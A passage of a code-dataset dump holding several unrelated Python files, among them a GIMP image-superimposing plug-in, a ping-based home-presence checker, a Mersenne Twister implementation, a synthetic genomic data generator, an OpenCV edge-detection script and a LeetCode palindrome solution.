% heightImage)\n\t\tprint(\"Width drawable = %s\" % widthDrawable)\n\t\tprint(\"Height drawable = %s\" % heightDrawable)\n\t\t# print(\"Horizontal location = %s\" % horizontalLocation)\n\t\t# print(\"Vertical location = %s\" % verticalLocation)\n\t\tprint(\"Image filename = %s\" % image.filename)\n\t\n\t\t# Open the image file to be superimposed and get its drawable object.\n\t\n\t\timage_super = pdb.gimp_file_load(filename_superimpose, filename_superimpose)\n\t\tdrawable_super = pdb.gimp_image_get_active_layer(image_super)\n\t\n\t\tprint(\"Width super image = %s\" % image_super.width)\n\t\tprint(\"Height super image = %s\" % image_super.height)\n\t\tprint(\"Width super drawable = %s\" % drawable_super.width)\n\t\tprint(\"Height super drawable = %s\" % drawable_super.height)\n\t\n\t\t# How many layers does the current image now contain?\n\t\t#\n\t\t# Use gimp-edit-copy and gimp-edit-paste?\n\t\t\n\t\tcopy_result = pdb.gimp_edit_copy(drawable_super)\n\t\t\n\t\tif (copy_result == True) :\n\t\t\t\n\t\t\tprint(\"True\")\n\t\t\t\n\t\telse :\n\t\t\t\n\t\t\tprint(\"False\")\n\t\t\n\t\tprint(\"Selection copy result = %s\" % copy_result)\n\t\n\t\t# pdb.gimp_drawable_update(drawable, horizontalLocation, verticalLocation, 384, 216)\n\t\n\t\t# The following operation should paste the image which is in the buffer, into a new layer of the\n\t\t# original image.\n\t\n\t\tpdb.gimp_edit_paste(drawable, True)\n\t\t\n\t\twidthImage = image.width\n\t\theightImage = image.height\n\t\t\n\t\twidthDrawable = drawable.width\n\t\theightDrawable = drawable.height\n\t\n\t\tprint(\"Width image = %s\" % widthImage)\n\t\tprint(\"Height image = %s\" % heightImage)\n\t\tprint(\"Width drawable = %s\" % widthDrawable)\n\t\tprint(\"Height drawable = %s\" % heightDrawable)\n\t\t# print(\"Horizontal location = %s\" % horizontalLocation)\n\t\t# print(\"Vertical location = %s\" % verticalLocation)\n\t\t\n\t\t# Move the \n\t\t\n\t\t# pdb.gimp_drawable_update()\n\t\t\n\t\tdrawable_new = pdb.gimp_image_flatten(image)\n\t\t\n\t\tpdb.gimp_file_save(\n\t\n\t\t image,\n\t\t drawable_new,\n\t\t filename,\n\t\t filename\n\t\t)\n\n\t\t# End the GIMP Undo group.\n\n\t\tpdb.gimp_undo_push_group_end(image)\n\n\t\t# Close the image now that we have finished with it, otherwise it will use up memory unnecessarily.\n\n\t\tpdb.gimp_image_delete(image)\n\n\t# End of for loop.\n\n\tprint(\"%s : Exit\" % (nameFunction))\n\n\n# register(\n#\t\"superimpose_image_over_another_interactive\", # The name of the command.\n#\t\"Superimpose one image over the top of another.\", # A brief description of the command.\n#\t\"Superimpose one image over the top of another.\", # Help message.\n#\t\"Craig Sanders\", # Author.\n#\t\"Craig Sanders\", # Copyright holder.\n#\t\"2018\", # Date.\n#\t\"Superimpose one image over another\", # The way the script will be referred to in the menu.\n#\t\"RGB*, GRAY*\", # Image mode\n#\t[\n#\t\t(PF_IMAGE, \"image\", \"Input image\", None),\n#\t\t(PF_DRAWABLE, \"drawable\", \"Input layer\", None),\n#\t\t(PF_FILE, \"filename\", \"Save image using a different filename.\\nLeave as (None) to save using the\\ncurrent filename.\", None)\n#\t],\n#\t[],\n#\tscale_and_set_size_interactive,\n#\tmenu=\"/Image/Superimpose one image over the top of another.\")\n\n\nregister(\n\t\"superimpose_image_over_another_noninteractive\", # The name of the command.\n\t\"Superimpose an image over the top of another.\", # A brief description of the command.\n\t\"Superimpose an image over the top of another.\", # Help message.\n\t\"Craig Sanders\", # Author.\n\t\"Craig Sanders\", # Copyright holder.\n\t\"2018\", # Date.\n\t\"Superimpose an image over another\", # The way the script will be referred to in the menu.\n\t# \"RGB*, GRAY*\", # Image mode\n\t\"\", # Create a new image, don't work on an existing one.\n\t[\n\t\t# (PF_IMAGE, \"image\", \"Input image\", None),\n\t\t# (PF_DRAWABLE, \"drawable\", \"Input layer\", None),\n\t\t# (PF_FILE, \"filename\", \"Image to superimpose over current image.\", None),\n\t\t(PF_STRING, \"list_filenames\", \"Files which contain background images\\n(Multiple files should be separated by ';' characters)\", \"\"),\n\t\t(PF_STRING, \"list_filenames_superimpose\", \"Files which contain images to superimpose\\n(Multiple files should be separated by ';' characters)\", \"\")\n\t\t# (PF_INT, \"horizontalLocation\", \"Horizontal location of superimposed image (in pixels)\", 0),\n\t\t# (PF_INT, \"verticalResolution\", \"Vertical location of superimposed image (in pixels)\", 0)\n\t],\n\t[],\n\tsuperimpose_image_over_another_noninteractive,\n\tmenu=\"/Image/Craig's Utilities/\")\n\n\n# register(\n#\t\"superimpose_image_over_another_noninteractive\", # The name of the command.\n#\t\"Superimpose an image over the top of another.\", # A brief description of the command.\n#\t\"Superimpose an image over the top of another.\", # Help message.\n#\t\"Craig Sanders\", # Author.\n#\t\"Craig Sanders\", # Copyright holder.\n#\t\"2018\", # Date.\n#\t\"Superimpose one image over another\", # The way the script will be referred to in the menu.\n#\t# \"RGB*, GRAY*\", # Image mode\n#\t\"\", # Create a new image, don't work on an existing one.\n#\t[\n#\t\t(PF_INT, \"horizontalResolution\", \"Horizontal resolution (in pixels)\", 1920),\n#\t\t(PF_INT, \"verticalResolution\", \"Vertical resolution (in pixels)\", 1080),\n#\t\t(PF_INT, \"interpolationMode\", \"Interpolation mode (0,1,2, or 3)\", 3),\n#\t\t(PF_STRING, \"listFiles\", \"List of image files to operate on. The entries in the list should be separated by ':' characters.\", \"\")\n#\t],\n#\t[],\n#\tsuperimpose_image_over_another_noninteractive,\n#\tmenu=\"/File/Superimpose one image over another - Non-interactive\")\n\n\nclass SuperimposeImageObject :\n\n\tnameClass = \"SuperimposeImageObject\"\n\n\timage = None\n\tdrawable = None\n\n\thorizontalResolution = None\n\tverticalResolution = None\n\n\twidthImage_original = None\n\theightImage_original = None\n\n\tfilename\t\t = None\n\n\tresizeAmount = 1.0\n\n\tinterpolationMode = INTERPOLATION_NONE\n\n\n\tdef __init__(\n\n\t self,\n\t image,\n\t drawable,\n\t horizontalResolution,\n\t verticalResolution,\n\t interpolationMode,\n\t filename\n\t) :\n\n\t\tnameMethod = self.nameClass + \"::__init__\"\n\n\n\t\tprint(\"%s : Enter\" % (nameMethod))\n\n\t\tself.image = image\n\t\tself.drawable = drawable\n\n\t\tself.horizontalResolution = horizontalResolution\n\t\tself.verticalResolution = verticalResolution\n\n\t\tself.widthImage_original = image.width\n\t\tself.heightImage_original = image.height\n\n\t\tself.interpolationMode = interpolationMode\n\n\t\tself.filename\t\t = filename\n\n\t\tprint(\"%s : Exit\" % (nameMethod))\n\n\n\tdef run(self) :\n\n\n\t\tnameMethod = self.nameClass + \"::__init__\"\n\n\n\t\tprint(\"%s : Enter\" % (nameMethod))\n\t\t\n\t\tprint(\"%s : Exit\" % (nameMethod))\n\nmain()\n","sub_path":"python/list_superimposeImageOverAnother.py","file_name":"list_superimposeImageOverAnother.py","file_ext":"py","file_size_in_byte":12897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"24845330","text":"\nimport numpy as np\nfrom mp_cython import *\nfrom mp_python import *\nfrom mp_numba import *\n\ndata = np.random.random((101, 101))\ndiag = np.concatenate([np.diag(data, 1), [data[-1, 0]]])\n\ndeltas = [np.zeros((100, 100), dtype=np.float64) for _ in range(6)]\ntwoopt_matrix_python(data, diag, 100, deltas[0])\ntwoopt_matrix_cython(data, diag, 100, deltas[1])\ntwoopt_matrix_numba(data, diag, 100, deltas[2])\ntwoopt_matrix_outerparallelcython(data, diag, 100, deltas[3])\ntwoopt_matrix_innerparallelcython(data, diag, 100, deltas[4])\ntwoopt_matrix_allparallelcython(data, diag, 100, deltas[5])\n\nassert np.any(deltas[0] != 0)\nfor delta in deltas[1:]:\n assert np.all((delta - deltas[0] < 10 ** -10))\nprint('Matrix tested OK')\n\ndeltas = [np.zeros((100, 100), dtype=np.float64) for _ in range(6)]\ntwoopt_submatrix_python(data, diag, 0, 2, 98, 98, deltas[0])\ntwoopt_submatrix_cython(data, diag, 0, 2, 98, 98, deltas[1])\ntwoopt_submatrix_numba(data, diag, 0, 2, 98, 98, deltas[2])\ntwoopt_submatrix_outerparallelcython(data, diag, 0, 2, 98, 98, deltas[3])\ntwoopt_submatrix_innerparallelcython(data, diag, 0, 2, 98, 98, deltas[4])\ntwoopt_submatrix_allparallelcython(data, diag, 0, 2, 98, 98, deltas[5])\n\n\nassert np.any(deltas[0] != 0)\nfor delta in deltas[1:]:\n assert np.all((delta - deltas[0] < 10 ** -10))\nprint('Submatrix tested OK')\n","sub_path":"mp_cython/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"82623129","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#libraries imports\nimport os\nimport json\nimport sys\nimport socket\nimport argparse\nimport logging\nimport subprocess\n\n# DEFAULT VALUES ####\n\n#Const faut the default conf path\nDEFAULT_CONF_PATH = os.getenv(\"HOME\")+\"/.config/homy.conf\"\n\n#Default tmp path\ntmpPath = \"/tmp/homy.tmp\"\n\n#Default number of consecutive non-matching scans needs to be performed to change the host state\nchangeThreshold = 5\n\n#Default action when a host went \"away\" (nothing)\naAction = \"\"\n\n#Default action when a host came \"here\" (nothing)\nhAction = \"\"\n\n#default host array\nhosts = []\n\n#default host dict\ntmp = {}\n\n#####################\n\n# METHODES ##########\n\ndef initArgs():\n \"Methode used to define flags\"\n\n #Initialisation of the argument parser\n parser = argparse.ArgumentParser(description='Homy, Home presence fetcher')\n\n #Argument used to specify the path to the configuration file if you don't want to use the default one\n parser.add_argument(\"-c\", \"--config\", metavar=\"path\", type=str, help=\"Path to the configuration file (default is '$HOME/.config/homy.conf').\", required=False)\n parser.add_argument(\"-v\", \"--verbose\", help=\"Enable verbose mode.\", action=\"store_true\", required=False)\n parser.add_argument(\"-r\", \"--readable\", help=\"Output data in a human readable format.\", action=\"store_true\", required=False)\n parser.add_argument(\"-a\", \"--absolute\", help=\"Output if the host is 'here' or 'away' but no temporary state ('arriving', 'leaving').\", action=\"store_true\", required=False)\n parser.add_argument(\"-q\", \"--query\", help=\"Only query but don't trigger connexion/deconnexion actions.\", action=\"store_true\", required=False)\n\n return vars(parser.parse_args())\n\ndef jsonLoader(path, fileRole, fileMode):\n \"Methode used to import and parse a json file\"\n\n #Check if the file exist\n try:\n #Import json\n with open(path, fileMode) as data:\n return json.load(data)\n\n #If not, inform the user and quit\n except IOError:\n log.critical(\"No \" + fileRole + \" file found. Exiting ...\")\n sys.exit()\n #If unreadable, inform the user and quit\n except:\n if not fileMode == \"a+\":\n log.critical(\"Error reading the \" + fileRole + \" file, check your JSON syntax. Exiting ...\")\n sys.exit()\n\ndef importTmp(path):\n \"Methode used to import the temporary file\"\n\n global tmp\n\n #Load the JSON file, create it if it does not exist\n tmp = jsonLoader(path, \"temporary\", \"a+\")\n\n #keep it a dict if the file is empty (just created)\n if tmp is None:\n tmp = {}\n\n log.debug(\"Temporary file successfully loaded from \" + path)\n\ndef processData():\n \"Methode used to process the data from the scan and the tmp file\"\n\n #Check each host/tmp matching entries and update their state\n for host in hosts:\n for key in tmp.keys():\n if key == host['ip']:\n\n log.debug(\"Cheking \" + host['name'] + \" state\")\n\n #If the host was here\n if tmp[key]['state'] == \"here\":\n\n #and he's actually offline\n if host['state'] == \"offline\":\n tmp[key]['state'] = \"leaving\"\n tmp[key]['since'] = 0\n else:\n tmp[key]['since'] += 1\n\n #If the host was leaving\n elif tmp[key]['state'] == \"leaving\":\n\n #and he's still offline\n if host['state'] == \"offline\":\n if tmp[key]['since'] > changeThreshold:\n log.debug(host['name'] + \" just leaved\")\n tmp[key]['state'] = \"away\"\n tmp[key]['since'] += 1\n if not args['query']:\n triggerAction(host['aAction'])\n else:\n log.debug(host['name'] + \" is leaving\")\n tmp[key]['since'] += 1\n elif host['state'] == \"online\":\n tmp[key]['state'] = \"here\"\n tmp[key]['since'] = 0\n\n #If the host was away\n elif tmp[key]['state'] == \"away\":\n\n #and he's actually online\n if host['state'] == \"online\":\n tmp[key]['state'] = \"arriving\"\n tmp[key]['since'] = 0\n else:\n tmp[key]['since'] += 1\n\n #If the host was arriving\n else:\n\n #and he's actually here\n if host['state'] == \"online\":\n if tmp[key]['since'] >= changeThreshold:\n log.debug(host['name'] + \" just arrived\")\n tmp[key]['state'] = \"here\"\n tmp[key]['since'] += 1\n if not args['query']:\n triggerAction(host['hAction'])\n else:\n log.debug(host['name'] + \"is arriving\")\n tmp[key]['since'] += 1\n elif host['state'] == \"online\":\n tmp[key]['state'] = \"here\"\n tmp[key]['since'] = 0\n\ndef triggerAction(action):\n \"Methode used to execute actions if the host arrived or leaved\"\n\n if action is not None:\n subprocess.call(action, shell=True)\n log.debug(\"Exec: \" + action)\n\ndef exportTmp(path):\n \"Methode used to export the actual state to the tmp file\"\n\n with open(path, 'w') as tmpFile:\n json.dump(tmp, tmpFile)\n\n\ndef importConf(path):\n \"Methode used to import the configuration from a given path\"\n\n global tmpPath, changeThreshold, hosts, aAction, hAction\n\n #Load the json conf parsed in a list\n conf = jsonLoader(path, \"configuration\", \"r\")\n\n #Replace the value if it's defined in the conf list\n if \"settings\" in conf:\n if \"tmpPath\" in conf[\"settings\"]:\n tmpPath=conf[\"settings\"][\"tmpPath\"]\n\n if \"changeThreshold\" in conf[\"settings\"]:\n changeThreshold=conf[\"settings\"][\"changeThreshold\"]\n\n #Load the hosts from the conf file\n if \"hosts\" in conf:\n for host in conf[\"hosts\"]:\n\n #if the name and the host id defined (min info)\n if host[\"name\"] and host[\"ip\"]:\n aAction = None\n hAction = None\n\n #optional parameters\n if aAction in host:\n aAction = host['aAction']\n if hAction in host:\n hAction = host['hAction']\n\n hosts.append({'name': host[\"name\"], 'ip': host[\"ip\"], 'aAction': aAction, 'hAction': hAction})\n else:\n log.debug(\"An host as been ignored, name or ip is missing.\")\n #If their is no hosts, inform the user then exit\n else:\n log.critical(\"No hosts in the configuration file. Nothing to do. Exiting ...\")\n sys.exit()\n\ndef pingOs(ip):\n \"Methode used to do an UDP check on a given ip\"\n\n try:\n #One single packet ping. If it takes more than 1 sec to respond, end the subprocess\n #for a better execution time. (false positive is negated by the change threshold)\n response = subprocess.check_output([\"ping\", \"-c\", \"1\", \"-w\", \"1\", ip])\n return True\n except:\n return False\n\ndef checkHosts():\n \"Methode used to check the state of each hosts\"\n\n global tmp\n\n #For each hosts try to to an OS ping (binded to linux atm) and set the host to offline/online\n for host in hosts:\n if pingOs(host[\"ip\"]):\n host['state'] = \"online\"\n #This instruction add the host to the dictionnary 'tmp' with this values. If it does exist, it do nothing.\n tmp.setdefault(host['ip'],{\"state\": \"here\", \"since\": 0})\n else:\n host['state'] = \"offline\"\n #Same than line 180\n tmp.setdefault(host['ip'],{\"state\": \"away\", \"since\": 0})\n\ndef outputData():\n \"Methode used to ouput and format the data\"\n\n #For each hosts\n for host in hosts:\n for key in tmp.keys():\n if key == host['ip']:\n\n if args['absolute']:\n if args['readable']:\n print(host['name'] + \"@\" + host['ip'] + \" is \" + absoluteState(tmp[key]['state']) + \" since \" + str(tmp[key]['since']) + \" check(s)\")\n else:\n print(host['name'] + \",\" + host['ip'] + \",\" + absoluteState(tmp[key]['state']) + \",\" + str(tmp[key]['since']))\n else:\n if args['readable']:\n print(host['name'] + \"@\" + host['ip'] + \" is \" + tmp[key]['state'] + \" since \" + str(tmp[key]['since']) + \" check(s)\")\n else:\n print(host['name'] + \",\" + host['ip'] + \",\" + tmp[key]['state'] + \",\" + str(tmp[key]['since']))\n\ndef absoluteState(state):\n \"Methode used to return only 'here' or 'away' by converting 'leaving' and 'arriving'\"\n\n if state == \"leaving\":\n return \"here\"\n elif state == \"arriving\":\n return \"away\"\n else:\n return state\n\n\n# MAIN ##############\n\nif __name__ == \"__main__\":\n\n #Initialize the arguments\n args = initArgs()\n #configure the logging\n logging.basicConfig(format='%(message)s', level=logging.INFO)\n log = logging.getLogger('log')\n\n #if the -v flag is used, set the logging level to DEBUG\n if args['verbose']:\n log.setLevel(\"DEBUG\")\n\n #if the -c flag is used, try to import the file at the given path\n if args['config']:\n importConf(args['config'])\n log.debug(\"Custom configuration successfully loaded from \" + args['config'])\n else:\n importConf(DEFAULT_CONF_PATH)\n log.debug(\"Default configuration successfully loaded from \" + DEFAULT_CONF_PATH)\n\n #Import the temp file\n importTmp(tmpPath)\n #Check the actual host state\n checkHosts()\n #Process the data regarding of the last checks\n processData()\n #Print the data on stdout\n outputData()\n #Export the new data to the tmp file\n exportTmp(tmpPath)\n\n#####################\n","sub_path":"homy.py","file_name":"homy.py","file_ext":"py","file_size_in_byte":10271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"561993994","text":"from matplotlib import pyplot\n\ndef get_lowest_bits(n, number_of_bits):\n mask = (1 << number_of_bits) - 1\n return n & mask\n\nclass MTRand:\n MASK32 = 0xffffffff\n W = 32\n N = 624\n M = 397\n R = 31\n A = 0x9908B0DF\n U = 11\n D = 0xFFFFFFFF\n S = 7\n B = 0x9D2C5680\n T = 15\n C = 0xEFC60000\n L = 18\n F = 1812433253\n LOWER_MASK = (1 << R) - 1\n UPPER_MASK = (1 << R) # doesn't work unless W=32 and R=31\n \n def __init__(self, seed):\n self.MT = [0] * self.N\n self.index = self.N\n self.MT[0] = seed & self.MASK32\n\n for i in range(1, len(self.MT)):\n self.MT[i] = (self.F * (self.MT[i-1] ^ (self.MT[i-1] >> (self.W-2))) + i) & self.LOWER_MASK\n\n def next(self):\n if self.index >= self.N:\n if self.index > self.N:\n raise Exception(\"Generator was never seeded\")\n self.twist()\n \n y = self.MT[self.index]\n y = y ^ ((y >> self.U) & self.D)\n y = y ^ ((y << self.S) & self.B)\n y = y ^ ((y << self.T) & self.C)\n y = y ^ (y >> self.L)\n\n self.index += 1\n return y #& self.LOWER_MASK\n\n def twist(self):\n for i in range(self.N):\n x = ( self.MT[i] & self.UPPER_MASK ) + ( self.MT[(i+1) % self.N] & self.LOWER_MASK )\n xA = x >> 1\n if x % 2:\n xA = xA ^ self.A\n self.MT[i] = self.MT[(i+self.M) % self.N] ^ xA\n self.index = 0 \n\nif __name__ == '__main__':\n r = MTRand(3423453245)\n\n data = [r.next() for i in range(5000)]\n pyplot.hist(data)\n pyplot.show()\n\n \n","sub_path":"python/project/challenge21.py","file_name":"challenge21.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"69181660","text":"### DATASET GENERATION MODULE: Synthetic Genomic Seq Dataset ##\nimport pandas as pd\nimport numpy as np\n\ndef random_data(size, ratio):\n # Creates random dataset filled with random integers 0, 1 or 2\n dataset = pd.DataFrame(np.random.randint(0, 3, size=size))\n # Creates assigns random labels to each sample on the random datasets\n #labels = np.random.randint(0, 2, size[0])\n labels = generateLabels(size[0], ratio)\n return dataset, labels\n\n# Helper function that checks if the spike has already been chosen\ndef alreadySpiked(index, spikeIndexes):\n for spike in spikeIndexes:\n if spike == index:\n return True\n\ndef generate_spike_indexes(features, number_of_spikes, betaglobin, spike_array):\n index = np.random.randint(0, features)\n if(len(spike_array) >= number_of_spikes):\n return spike_array\n else:\n if(index == betaglobin):\n return generate_spike_indexes(features, number_of_spikes, betaglobin, spike_array)\n elif(alreadySpiked(index, spike_array)):\n return generate_spike_indexes(features, number_of_spikes, betaglobin, spike_array)\n else:\n spike_array.append(index)\n return generate_spike_indexes(features, number_of_spikes, betaglobin, spike_array)\n\ndef createDataset(sampleNumber, featureNumber, balanceRatio, numberOfSpikes, betaglobinIndex, spikedArray, spikeIndexes):\n # Creates a Pandas Dataframe with shape: (# of samples, # of features) filled with random integers between {0, 1, 2}\n dataset = pd.DataFrame(np.random.randint(0, 3, size=(sampleNumber, featureNumber)))\n # Creates a Pandas Series size of (# of samples) filled with the value 2 (This is supposed to represent HbS)\n betaglobin = [2] * sampleNumber\n # List of \"spikes\" / enriched alleles\n if len(spikedArray) == 0:\n spikedArray = generateSpikes(sampleNumber, balanceRatio, numberOfSpikes)\n # Assigned label for each sample in a list\n labels = generateLabels(sampleNumber, balanceRatio)\n # \"Injects\" or inserts the list of spikes to the dataset\n dataset, spikeIndexes = insertSpike(dataset, spikedArray, betaglobin, featureNumber, betaglobinIndex, [])\n else:\n # Assigned label for each sample in a list\n labels = generateLabels(sampleNumber, balanceRatio)\n dataset, spikeIndexes = insertSpike(dataset, spikedArray, betaglobin, featureNumber, betaglobinIndex, spikeIndexes)\n return dataset, labels, spikeIndexes, spikedArray\n\ndef generateSpikes(sampleNumber, balanceRatio, numberOfSpikes):\n spikedArray = [] # Initializes empty list (List of spikes)\n variants = [0, 1, 2] # Possible variants represented as counts: ()\n # Probabilities for each of the possible variants to occur based on the corresponding label, in order (0, 1, 2)\n probabilitiesControl = [0.70, 0.15, 0.15]\n probabilitiesDisease = [0.15, 0.15, 0.70]\n # Repeats for the number of spikes desired\n for i in range(0, numberOfSpikes):\n spikedFeature = [] # Empty list (Spiked allele)\n for i in range (0, sampleNumber):\n # If the index is below the cut off sample based on the balance ratio then the sample is in the control cohort, else is in the disease cohort\n if i < sampleNumber * balanceRatio:\n # Inserts the value based on the probabilities above (for Control label)\n spikedFeature.append(np.random.choice(variants, p=probabilitiesControl))\n else:\n # Inserts the value based on the probabilities above (for Disease label)\n spikedFeature.append(np.random.choice(variants, p=probabilitiesDisease))\n # Adds spikes allele to the list\n spikedArray.append(spikedFeature)\n return spikedArray\n\ndef generateLabels(sampleNumber, balanceRatio):\n labels = [] # Empty list\n classes = [0, 1]\n probabilities = [1 - balanceRatio, balanceRatio]\n # Iterates through number of samples\n for i in range (0, sampleNumber):\n # If the index is below the cut off sample based on the balance ratio then the sample is in the control cohort, else is in the disease cohort\n if i < sampleNumber * balanceRatio:\n # Control cohort (0)\n labels.append(0)\n else:\n # Disease cohort (1)\n labels.append(1)\n return labels\n\n##### Need to add a way to handle if the spike index has already been used (Possible recursive function? pop from spiked array?)\ndef insertSpike(dataset, spikedArray, betaglobin, featureNumber, betaglobinIndex, spikeIndexes):\n dataset[betaglobinIndex] = betaglobin # adds the betaglobin Series to the dataset\n if(len(spikeIndexes) > 0):\n for i in range(0, len(spikeIndexes)):\n dataset[spikeIndexes[i]] = spikedArray[i]\n else:\n for spike in spikedArray:\n # Selects a random index\n spikeIndex = np.random.randint(0, featureNumber)\n # If the index is not already used by another spike, or the betaglobin index, then proceed\n if spikeIndex != betaglobinIndex and not alreadySpiked(spikeIndex, spikeIndexes):\n # Adds spike to dataset\n dataset[spikeIndex] = spike\n # Adds index to to the tracking array\n spikeIndexes.append(spikeIndex)\n return dataset, spikeIndexes\n\ndef create_dataset(samples, features, balance, spikes, betaglobin):\n # Dataframe filled with 0s\n dataset = pd.DataFrame(np.zeros((samples, features)))\n # Fill in each sample\n #dataset = dataset.astype('int32')\n\n betaglobin_array = [2.0] * samples\n dataset[betaglobin] = betaglobin_array\n\n variants = [0, 1, 2] # Possible variants represented as counts: ()\n # Probabilities for each of the possible variants to occur based on the corresponding label, in order (0, 1, 2)\n probabilitiesControl = [0.70, 0.15, 0.15]\n probabilitiesDisease = [0.15, 0.15, 0.70]\n\n labels = generateLabels(samples, balance)\n\n spike_indexes = generate_spike_indexes(features, spikes, betaglobin, [])\n\n for sample_index, sample in dataset.iterrows():\n print(sample_index)\n for column in dataset.columns:\n if(column == betaglobin):\n continue\n elif(alreadySpiked(column, spike_indexes)):\n if(labels[sample_index] == 1):\n dataset.at[sample_index, column] = np.random.choice(variants, p=probabilitiesDisease)\n elif(labels[sample_index] == 0):\n dataset.at[sample_index, column] = np.random.choice(variants, p=probabilitiesControl)\n else:\n dataset.at[sample_index, column] = np.random.randint(0, 3)\n\n return dataset, labels, spike_indexes\n","sub_path":"data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":6727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"261154192","text":"# coding: utf-8\n# python3.5.3\n# draw_image.py\n# ------------------------------------------------------------------------\n# purpose:\n# MyStudio 1레벨중 선택한 이미지 파일을 조각내는 기능, 조각 조절기능을 구현함.\n# 화면 없는 기능으로 utility 성임.\n\n\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom skimage import data, io, segmentation, color, measure, filters\nfrom skimage.color import rgb2gray\nfrom skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value\nfrom skimage.exposure import rescale_intensity\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument(\"--content\", type=str)\nparser.add_argument('--output', type=str)\nparser.add_argument('--KERNEL_SIZE', type=float)\nparser.add_argument('--COLOR_TYPE', type=int)\nparser.add_argument('--THREASH', type=int)\nparser.add_argument('--BLURRED', type=int)\nparser.add_argument('--cuda', type=int)\nargs = parser.parse_args()\n\n@adapt_rgb(each_channel)\ndef sobel_each(image):\n return filters.sobel(image)\n\n\n@adapt_rgb(hsv_value)\ndef sobel_hsv(image):\n return filters.sobel(image)\n\n\ndef as_gray(image_filter, image, *args, **kwargs):\n gray_image = rgb2gray(image)\n return image_filter(gray_image, *args, **kwargs)\n\n\n@adapt_rgb(as_gray)\ndef sobel_gray(image):\n return filters.sobel(image)\n\n# ====================================\n# read Image \n# ====================================\n# For Reading : No Blurred, Just Image\nimg_origin = data.imread(args.content)\n# For Scatch Mode\nimg = cv2.medianBlur(img_origin, args.BLURRED) # Blurred Image\n\nresult = []\n\n# ====================================\n# sketch 이미지 파일로 변환\n# ====================================\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nplt.xticks([])\nplt.yticks([])\n\nax.imshow(rescale_intensity(1 - sobel_gray(img)), cmap=plt.cm.gray)\nbbox = ax.get_tightbbox(fig.canvas.get_renderer())\nfig.savefig(\"Data/temp_draw.png\",\n bbox_inches=bbox.transformed(fig.dpi_scale_trans.inverted())) ","sub_path":"Programs/draw_image.py","file_name":"draw_image.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"389194963","text":"# https://leetcode.com/problems/longest-palindromic-substring/description/\n\n\nclass Solution:\n\n @staticmethod\n def expandPalindrome(s, i, j):\n r = 0\n while i-r >= 0 and j+r < len(s) and s[i-r] == s[j+r]:\n r += 1\n return (j+r) - (i-r) - 1\n\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n\n \"\"\"\n |<----length---->| (odd length)\n s e\n\n |<----length---->| (even length)\n s i' e\n\n length = e - s + 1\n i = (e + s) // 2 <= (e + s) / 2\n -> e + s >= 2i\n\n -> e >= i + (length - 1)/2\n s >= i - (length - 1)/2\n\n About e:\n x/2 >= x//2 >= (x-1)/2\n -> i + x//2 >= i + (x-1)/2\n -> e = i + length//2\n\n About s:\n (x-1)/2 >= (x-1)//2 >= (x-2)/2\n -> i - (x-1)//2 >= i - (x-1)/2\n -> s = i - (length-1)//2\n \"\"\"\n\n length = len(s)\n start = end = 0\n for i in range(length):\n len1 = self.expandPalindrome(s, i, i)\n len2 = self.expandPalindrome(s, i, i+1)\n length = max(len1, len2)\n if length > end - start:\n start = i - (length-1)//2\n end = i + length//2\n return s[start:end+1]\n","sub_path":"_PYTHON_/_problems_/_LC_/algorithms/longest_palindromic_substring.py","file_name":"longest_palindromic_substring.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"460357217","text":"import cv2\r\n'''OpenCV is a cross-platform library using which we can develop real-time computer\r\n vision applications. It mainly focuses on image processing, video capture and \r\n analysis including features like face detection and object detection.'''\r\n\r\nimport numpy as np\r\n'''Numpy provides a high-performance multidimensional array and basic \r\ntools to compute with and manipulate these arrays.'''\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\ndef canny(image):\r\n gray = cv2.cvtColor(lane_image, cv2.COLOR_BGR2GRAY) # Get the gray image\r\n blur = cv2.GaussianBlur(gray, (5, 5), 0) # Smooth the image; reduce the noise ;(5,5) kernel size\r\n canny = cv2.Canny(blur, 50, 150) # threshold\r\n return canny, blur, gray\r\n\r\nimage = cv2.imread('D:\\jinna\\Python\\source/test_image.jpg')\r\nlane_image = np.copy(image) # Protect the original image\r\ncanny, blur, gray= canny(lane_image)\r\n\r\ncv2.imshow('3_canny', canny)\r\ncv2.imshow('2_blur', blur)\r\ncv2.imshow('1_gray', gray)\r\ncv2.imshow('0_original_image', image) # The image is shown by imshow\r\ncv2.waitKey(0) #The image keep showing until the keyboard is pressed","sub_path":"Lane_Line_detection/Lin_1_canny.py","file_name":"Lin_1_canny.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"20282557","text":"\nimport subprocess \nimport os\nimport shutil \n\nTS_BASE = \"./@types/ol/\"\n\nfw = os.walk(TS_BASE)\n\nwhile True: \n try:\n curr_dir_info = next(fw)\n for _file in curr_dir_info[2]:\n if _file.endswith(\".d.ts\"):\n continue\n if _file.endswith(\".ts\"):\n ts_path = os.path.join(curr_dir_info[0], _file)\n declaration_path = ts_path.replace(\".ts\", \".d.ts\")\n if not os.path.exists(declaration_path):\n subprocess.call([\"npx\", \"tsc\", \"-d\", ts_path])\n except StopIteration:\n break","sub_path":"compile-declaration-files.py","file_name":"compile-declaration-files.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"500193401","text":"# -*- coding: utf-8 